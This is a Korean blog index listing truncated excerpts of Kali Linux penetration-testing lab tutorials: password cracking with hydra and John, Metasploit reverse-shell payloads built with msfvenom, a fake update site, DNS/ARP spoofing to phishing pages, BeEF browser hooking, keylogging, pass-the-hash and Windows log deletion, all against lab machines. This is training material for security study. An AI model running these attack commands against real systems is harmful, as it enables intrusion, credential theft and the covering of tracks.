본문 바로가기

Learning

searchsploit (Exploit DB) [실습] 칼리 리눅스 사용하기 8 (searchsploit CMD 대해서) Exploit DB 사용하기(www.exploit-db.com) ■ searchsploit 실행 방법 Exploitation Tools > Explit Database > searchsploit or # searchsploit ... # searchsploit Usage: searchsploit [options] term1 [term2] ... [termN] ========== Examples ========== searchsploit afd windows local searchsploit -t oracle windows searchsploit -p 39446 ========= Options ========= -c, --case .. 더보기
online crack remote passwd attack (hydra & xhydra) [실습] 칼리 리눅스 사용하기 ■ 사용시스템 - Metasploitable V2 Linux - KaliLinux 온라인(Online) 패스워드 크랙(Crack)하기(Remote Password Attack) (GUI) xhydra(hydra-gtk), (CLI) hydra 툴을 사용해 보자. ■ 프로그램 사용방법 Password Attacks > ONline Attacks > hydra-gtk (hydra) or # hydra (작업 시나리오) (KaliLinux(hydra)) --- password crack ---> (Metasploitable V2 Linux(ftpd)) (KaliLinux) ① Meta 서버의 포트 스캔 # nmap -sV -O -F 192.168.10.134 Metasploita.. 더보기
John The Ripper John The Ripper (GUI) johnny 툴 (TUI) john CMD # cd /root/bin # ls passwd.txt (root, user01) passwd2.txt(root, user01, hacker) # johnny & Open Password File 선택 EX: /root/bin/passwd2.txt Options 선택 기본값 사용 Statistics 선택(how login johnny has been running an active session.) 기본값 사용 Settings 선택 기본값 사용 Output 상단 부분의 "Start Attack" 선택 왼쪽 상단의 "Passwords" 선택 더보기
패스워드 크랙 [실습] 칼리 리눅스 사용하기(online/offline passowrd crack) 암호 클랙 방법의 종류 추측 공격하기(Guess, Manually guess using information obtained about a target) 기본 암호를 사용하기(Default password attack, The device has default password, such as router) 사전 파일 사용 공격(Dictionary attack, Use an automated attack that tries all the possible dictionary words) 무작위 대입 공격(Brute-force, Try all the possible character combinations) 하이브리드 공격(.. 더보기
Wallpaper Engine http://store.steampowered.com/app/431960/ WHAT THE DEVELOPERS HAVE TO SAY: Why Early Access?“Early Access will allow me to ensure stability and compatibility for a wider range of systems and focus on expanding features that users need the most. Since a multitude of wallpaper types are supported, I need to figure out which kind of wallpapers are most commonly used and then prioritize further deve.. 더보기
MAC 충돌 점검 프로그램 작성 # vi mac+check.sh ping 172.16.6.200 ~ 172.16.6.230 arp -an > arp.txt 172.16.6.200 mac1 172.16.6.201 mac2 172.16.6.202 mac3 ... 172.16.6.230 mac30 같은 MAC주소를 갖는 IP를 확인하고 싶다. ------------------------------------- 맥 어드레스 충돌. IP는 같은데 맥어드레스가 충돌나는 경우 -------------------------------------- ./mac_check.sh 수행결과 172.16.6.200 mac1 172.16.6.201 mac1 172.16.6.220 mac20 172.16.6221 mac20 ----------------------.. 더보기
칼리리눅스 내장된 모의해킹 툴에 대한 사용법 칼리리눅스 내장된 모의해킹 툴에 대한 사용법 칼리리눅스 툴 사이트 http://tools.kali.org/tools-listing 칼리 리눅스와 백트랙을 활용한 모의해킹 칼리 리눅스 도구 목록 Information Gathering 정보수집 Vulnerability Analysis 취약점 분석 Wireless Attacks 무선 인터넷 공격 Web Application 웹 응용 프로그램 Exploitation Tools 착취, 이용 Forensics Tools 위조, 변조 Stress Testing 압박 Sniffing & Spoofing 스니핑 & 스푸핑 Password Attacks 패스워드 공격 Maintaining Access 접속 유지 Reverse Engineering 복제 Hardware H.. 더보기
metasploit 20. DNS + ARP Spoofing + Fake Web site ***************************************************************************************[실습] Fake Site 구성(제한 시간: 30분) DNS Spoofing/Arp Spoofing : ettercap+Fake Web Site : SETookit(실습2)+문자메세지/메일 보내기: SETookit (실습 시스템)Victim system : windows 7(192.168.20.202)Attack system : KaliLinux(192.168.20.50)Router : firewall.example.com(192.168.20.100) (windows 7 system) 결과 확인http://www.google.com -> http://.. 더보기
metasploit 19. Fake Update Site 구축 [추가적인 실습] ■ Fake Update Site 구축 (KaliLinux) ① 클라이언트에 설치할 payload 생성[TERM1] 첫번째 터미널# cd /var/www/html # msfvenom \-p windows/meterpreter/reverse_tcp LHOST=192.168.20.50 LPORT=4444 \-f exe \-o payload.exe No platform was selected, choosing Msf::Module::Platform::Windows from the payloadNo Arch selected, selecting Arch: x86 from the payloadNo encoder or badchars specified, outputting raw payloadPay.. 더보기
metasploit 18. BeFF + MSF 브라우저 해킹 원격 쉘 얻기 [추가적인 실습] - 2015년 12월30일 현재 정상적으로 실습이 되지 않는다. BeFF + MSF = 통합BeEF와 MSF 사용하여 브라우저 해킹을 시도하고 원격 쉘을 얻는 과정을 이해해 보자. ■ 사용시스템- KaliLinux- Windows 7(Chrome 브라우저 사용) (windows 7) ■ 점검사항윈도우7 방화벽 설정을 내린다.Java 보안 설정에 192.168.20.50192.168.20.50:8080 사이트를 신뢰할 수 있는 사이트로 등록한다. (kaliLinux) ① BeEF 설정 점검 및 필요하면 변경[TERM1] 첫번째 터미널# vi /usr/share/beef-xss/config.yaml ..... (중략) ...../metasploit 더보기
metasploit 17. 웹 브라우저 해킹 BeFF [실습] 칼리 리눅스 사용하기(웹 브라우저 해킹) WEB Attack : XSS(Cross Side Script)BeEF(비프) XSS 프레임워크: 사용자 권한 획득 BeEF(Browser Exploit Framwork) 사용자 웹 브라우저로 웹페이지를 읽을 때 자바 스크립트 형태로 동작하며, 사용자 PC의 정보 수집 부터 메타 스플로잇 모듈을 이용한 광범위한 공격까지 가능한 도구이다. XSS(Cross Side Script) 취약점웹에서 사용하는 클라이언트 스크립트인 자바스크립트, VB 스크립트, CSS, 에이젝스(Ajax)등을 통해 스크립트에 접근한 사용자들에게 특정한 액션을 일으키게 하는 것을 의미한다.특정한 액셕이라는 것은 악성 코드 유포나, 윔, 바이러스 배포등이 보통의 목적이다. 또한 사용자 .. 더보기
metasploit 16. Java Applet Attack SE Tool Kit 실행(Fake Google WEB Site 구성) - Java Applet Attack(악성 프로그램 유포)(KarlLinux)# setoolkit Select from the menu: 1) Social-Engineering Attacks 2) Fast-Track Penetration Testing 3) Third Party Modules 4) Update the Metasploit Framework 5) Update the Social-Engineer Toolkit 5) Update SET configuration 6) Help, Credits, and About 99) Exit the Social-Engineer Toolkit set> 1 Select from the menu:.. 더보기
metasploit 15. SET(Social Engineering Tech.) SET(Social Engineering Tech.) ■ 사용시스템- Kali Linux- Windows 7 패스트 트랙(Fasttrack): 자동 공격 도구메타스포로잇 모듈을 사용한다. 이 도구는 메타스포로잇에 기반을 두고 있고 공격 기법 중 하나인 Autopwn 공격은 내장되어 있는 기능 중 엔맵(nmap)을 통해 네트워크 스캐닝 작업을 하여 대상 시스템을 검색하고, 그에 대한 운영체제, 포트, IP 주소를 분석하며 그에 해당하는 모든 취약점을 자동화 스크립트로 공격한다.칼리리눅스에서는 SET(사회 공학 기법)에 통합되었다. SET(Social Engineering Tech., 사회 공학적 공격 기법)사회공학이란 컴퓨터 보안에서 인간 상호작용의 깊은 신뢰를 바탕으로 사람들을 속여 정상 보안 절차를 깨.. 더보기
metasploit 14. 윈도우즈 환경에서 Metasploit 다운로드 [실습] 윈도우즈 환경에서 Metasploit 다운로드 하여 운영하는 방법윈도우즈(window2008)에 Metasploit 다운로드 하고 설치해 보자. MSF interface : (ㄱ) (TUI) console(msfconsole CMD) (ㄴ) (TUI) CMD(msfcli CMD) (ㄷ) (GUI) Armitage, msfgui, msfweb Armitage 도구와 msfguiArmitage는 Raphael Mudge가 개발한 GUI 기반을 둔 도구로 자동 공격 도구(점검 도구)인 메타스플로잇의 도구 중 하나로 포함돼 있다.스캔을 통해 해당 서비스에 적합한 공격을 골라내 선택할 수 있고, 옵션들도 자동으로 입력되기 때문에 점검자 입장에서는 많은 고민을 하지 않아도 되는 아주 편리한 도구이다. Ar.. 더보기
metasploit 13. 메타스플로잇 업데이트(msfupdate CMD) [실습] 메타스플로잇 업데이트(msfupdate CMD) 이 작업은 진행하지 않는다. -> 시간이 오래 걸린다. 만약 이 작업을 진행한다면 OS snapshot을 뜨고 작업한다.-> 나중에 에러 생기는 경우를 대비한다. (업데이트 하다가 문제가 발생경우가 많이 있다.) msfupdate 명령어를 통해 업데이트 하는 경우 metasploit-framework 관련 된 파일이 not found 에러메세지를 발생하면서 실행이 되지 않는다면 아래와 같은 절차를 통해 업데이트가 가능하다. ■ (2016년 01월06일 : KaliLinux 2.0 - kali scna repository 사용하는 경우) (ㄱ) 미러 사이트 확인 # curl –sI http://http.kali.org/README (ㄴ) /etc/a.. 더보기
metasploit 12. password the hash(hash dump) [실습] password the hash(hash dump) ■ 사용시스템 - KaliLinux - windows 2008 (windows 2008) (선수작업) 윈도우 2008 사용자 (EX: soldesk)의 암호를 쉬운 암호로 변경한다. (기존 암호) ==> (새로운 암호) 123 시작 > 관리도구 > 로컬 보안 정책 보안 설정 > 계정 정책 > 암호 정책 > "암호는 복잡성을 만족해야 함" 부분이 "사용 안 함"으로 설정 되어 있는지 확인 시작 > 관리도구 > 컴퓨터 관리 > 로컬 사용자 및 그룹 > 사용자 > soldesk 사용자를 선택하고 오른쪽 마우스를 클릭 암호 설정 > 계속 > 새암호(EX: 123) (KaliLinux) # netstat -an | grep :5432 # service .. 더보기
metasploit 11. 키보드 스니핑과 스크린샷 [실습] 키보드 스니핑과 스크린샷 ■ 사용 시스템- KaliLinux- Windows 2008 meterpreter의 getdesktop과 키 스니핑에 대해서 테스트해 보자.관련 명령어들 enumdesktops 접근 가능한 테스크톱과 윈도우 스테이션 전체 목록을 확인 getdesktop 현재 meterpreter 세션으로 작업하고 있는 사용자 시스템의 현재 테스크 톱 확인 setdesktop 현재 meterpreter 세션 테스크톱에서 다른 데스크톱 스테이션으로 변경 keyscan_start 현재 작업 중인 스테이션에서 키보드 스니퍼(가로채기)를 시작 keyscan_stop 현재 작업 중인 스테이션에서 키보드 스니퍼(가로채기)를 종료 keyscan_dump meterpreter 데스크톱 세션의 키보드 동.. 더보기
metasploit 10. 윈도우 2008 로그 삭제 [실습] 윈도우 2008 로그 삭제 ■ 사용 시스템- Windows 2008- KaliLinux ① 윈도우 2008에서 로그를 확인(window 2008) 로그 확인 작업시작 > 관리도구 > 이벤트 뷰어 > Windows 로그 > (응용프로그램|보안|Setup|시스템)log를 마음대로 지우고 수정할 수 있다. ② 칼리리눅스에서 연결된 세션의 윈도우 2008 운영체제 사용자 권한 상승 및 로그 지우기(Kali Linux)# cd /root/bin # vi reverse_resource2.rc 새로운 프로그램 제작 use exploit/multi/handlerset PAYLOAD windows/x64/meterpreter/reverse_tcpset LHOST 192.168.20.50set ExitSessio.. 더보기
metasploit 09. meterpreter를 이용한 윈도우즈 시스템 장악 [실습] 메타스플로잇을 사용하여 윈도우즈 시스템 장악(meterpreter를 이용한 Reverse TCP 공격) 이전 실습 중 아래 프로그램을 사용 했었다. (쉘을 통해서 사용하는 방식)java/shell/bind_tcpjava/shell/reverse_tcp 다음은 shell이 아닌 meterpreter 방식 (명령어를 수행하는 방식, 커넥션이 이루어진 이후 meterpreter수행)java/meterpreter/bind_tcpjava/meterpreter/reverce_tcp운영체제의 버전 마다 사용하는 명령어가 각 다르기 때문에 meterpreter에서 해당 운영체제의 명령어로전환하여 사용할 수 있다. ■ 사용시스템 - KaliLinux- windows 7 메타스플로잇의 메터프리터(Meterpret.. 더보기
metasploit 08. Tomcat 취약점 [실습] 메타스플로잇을 사용하여 서비스 취약점 점검(톰캣(Tomcat) 취약점 공격) ■ 사용시스템 - KaliLinux- Metasploitable V2 Linux 메타스플로잇을 사용하여 톰캣의 취약점을 공격해 보자.Tomcat V5 관리자 페이지에서 기본으로 사용되는 몇가지 취약한 계정의 정보를 대입해 알아보는 tomcat_mgr_login 스캔 도구를 사용한다. (KaliLinux) ① 타겟 시스템의 포트/서비스/버전을 확인# nmap -sV -p 1-65535 192.168.10.134 metasploitable V2 Linux ip : 192.168.10.134 포트 지정시 시간이 오래걸린다. nmap -sV 192.168.10.134 ........8180/tcp open http Apache.. 더보기